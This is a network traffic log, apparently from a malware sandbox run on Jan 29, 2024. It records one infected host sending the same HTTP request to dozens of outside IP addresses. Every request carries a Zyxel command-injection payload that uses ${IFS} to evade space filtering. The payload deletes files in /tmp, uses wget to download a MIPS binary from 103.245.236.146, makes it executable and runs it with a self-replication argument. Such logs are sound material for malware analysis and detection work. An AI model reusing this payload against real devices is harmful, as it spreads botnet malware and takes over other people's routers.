                                              Jan 29, 2024 07:03:39.795964003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1794192.168.2.1445052186.97.190.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.795994997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1795192.168.2.1450506109.253.42.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796019077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1796192.168.2.1444928137.33.106.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796057940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1797192.168.2.1433790103.238.49.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796093941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1798192.168.2.1436756117.24.29.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796153069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1799192.168.2.1440808209.177.73.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796188116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1800192.168.2.143467014.122.115.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796226025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1801192.168.2.1434754122.172.141.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796260118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1802192.168.2.145899067.186.48.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796289921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1803192.168.2.1447372183.151.170.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796325922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1804192.168.2.1450420142.184.189.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796367884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1805192.168.2.1439938101.54.251.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796387911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1806192.168.2.145900883.6.120.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796420097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1807192.168.2.143749017.51.67.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796480894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1808192.168.2.1458726116.182.117.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796509027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1809192.168.2.1457736155.183.205.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796559095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1810192.168.2.145227064.19.220.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796606064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1811192.168.2.1449924154.18.229.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796619892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1812192.168.2.1443328200.236.79.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796684027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1813192.168.2.144568668.120.77.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796721935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1814192.168.2.145266618.208.16.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796761036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1815192.168.2.145068448.116.26.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796799898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1816192.168.2.1447106138.141.160.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796854973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1817192.168.2.143512481.45.58.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796885014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1818192.168.2.144701091.33.116.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796921015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1819192.168.2.145361446.221.159.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796953917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1820192.168.2.1455762140.109.131.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.796991110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1821192.168.2.14557961.5.103.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797039986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1822192.168.2.1434910177.141.188.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797096014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1823192.168.2.1437502161.111.115.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797133923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1824192.168.2.1447258180.1.18.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797164917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1825192.168.2.146006051.238.179.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797203064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1826192.168.2.1442658220.32.74.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797255993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1827192.168.2.145744295.209.4.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797300100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1828192.168.2.143317019.192.8.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797326088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1829192.168.2.144885692.18.117.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797367096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1830192.168.2.145437035.147.154.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797414064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1831192.168.2.1437980147.129.123.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797452927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1832192.168.2.14469524.134.38.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797487020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1833192.168.2.144633231.95.209.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797518015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1834192.168.2.144616480.226.229.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797554016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1835192.168.2.1447712217.67.137.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797593117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1836192.168.2.1453990170.27.243.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797619104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1837192.168.2.1447456118.163.133.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797651052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1838192.168.2.1447002157.137.67.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797686100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1839192.168.2.14354485.204.36.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797724009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1840192.168.2.1448976180.95.76.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797765017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1841192.168.2.1454202192.202.176.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797810078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1842192.168.2.1454564151.88.93.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797858953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1843192.168.2.145024423.18.131.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797908068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1844192.168.2.144056872.233.36.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797939062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1845192.168.2.1450146123.203.105.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.797986984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1846192.168.2.145732868.5.13.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798026085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1847192.168.2.1438552178.50.34.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798055887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1848192.168.2.1443286216.212.154.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798101902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1849192.168.2.143973882.63.50.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798122883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1850192.168.2.145947475.141.100.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798152924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1851192.168.2.145949034.65.232.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798186064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1852192.168.2.144839277.113.254.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798227072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1853192.168.2.144094681.173.175.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798253059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1854192.168.2.1444866132.214.125.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798305035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1855192.168.2.1450136138.69.138.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798326969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1856192.168.2.1448996170.108.193.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.798361063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1857192.168.2.1436732119.109.204.20443
                                              TimestampBytes transferredDirectionData
